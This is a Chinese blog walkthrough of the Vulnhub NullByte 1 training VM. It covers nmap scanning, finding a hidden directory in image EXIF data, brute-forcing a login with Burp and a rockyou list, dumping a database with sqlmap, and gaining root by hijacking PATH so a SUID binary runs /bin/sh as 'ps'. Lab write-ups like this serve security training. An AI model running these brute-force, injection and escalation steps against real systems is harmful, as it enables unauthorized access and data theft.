Vulnhub靶机:NULLBYTE_ 1

介绍

系列:NullByte(此系列共1台)
发布日期:2015 年 8 月 1 日
难度:初级
运行环境:Virtualbox
目标:取得Root权限
学习:

  • nmap漏扫脚本
  • 暴力破解
  • SQL注入
  • 环境变量提权

靶机地址:https://www.vulnhub.com/entry/nullbyte-1,126/

信息收集

netdiscover主机发现

sudo netdiscover -i eth1 -r 192.168.56.0/24

主机信息探测
发现SSH运行在777端口

nmap -p- 192.168.56.109
nmap -p 80,111,777,56412 -A 192.168.56.109
nmap -p 80,111,777,56412 --script=vuln 192.168.56.109

网站探测

打开网站就是一个图片,页面源代码中有图片地址。
Vulnhub靶机:NULLBYTE_ 1_第1张图片
目录爆破没有发现有价值的信息,还是先看看图片吧,结果发现了一串字符。

wget http://192.168.56.109/main.gif
exiftool main.gif


尝试后发现这是一个网站目录,看起来需要一个密码才能登录进去。
Vulnhub靶机:NULLBYTE_ 1_第2张图片

暴力破解

使用BurpSuite进行暴力破解,字典选用的是rockyou,但是这个字典又太大,因此使用了SecLists中的\SecLists-2023.1\Passwords\Leaked-Databases\rockyou-70.txt
爆破出密码是:elite
Vulnhub靶机:NULLBYTE_ 1_第3张图片

SQL注入

登录后发现存在SQL注入,检查发现不存在cookie,那就好办了,直接sqlmap跑

sqlmap -u "http://192.168.56.109/kzMb5nVYJw/420search.php?usrtosearch=1" --dbs
sqlmap -u "http://192.168.56.109/kzMb5nVYJw/420search.php?usrtosearch=1" -D seth --tables
sqlmap -u "http://192.168.56.109/kzMb5nVYJw/420search.php?usrtosearch=1" -D seth -T users --columns
sqlmap -u "http://192.168.56.109/kzMb5nVYJw/420search.php?usrtosearch=1" -D seth -T users --dump

Vulnhub靶机:NULLBYTE_ 1_第4张图片

这段密文没法直接解出来,尝试后发现可以base64解码,最后解出对应明文是:omega
Vulnhub靶机:NULLBYTE_ 1_第5张图片
Vulnhub靶机:NULLBYTE_ 1_第6张图片

SSH登录

提权

根据命令行的历史记录,很轻松就找到了一个可疑的可执行文件。尝试运行,发现这个文件会调用其他文件

方式1

复制一个终端,并篡改环境变量

./procwatch
cp /bin/sh /tmp/ps
echo $PATH
export PATH=/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
./procwatch

方式2

本地新建一个终端,并篡改环境变量

echo "/bin/sh" > ps
chmod 777 ps
echo $PATH
export PATH=.:$PATH
echo $PATH
./procwatch

Vulnhub靶机:NULLBYTE_ 1_第7张图片

你可能感兴趣的:(靶机,Vulnhub)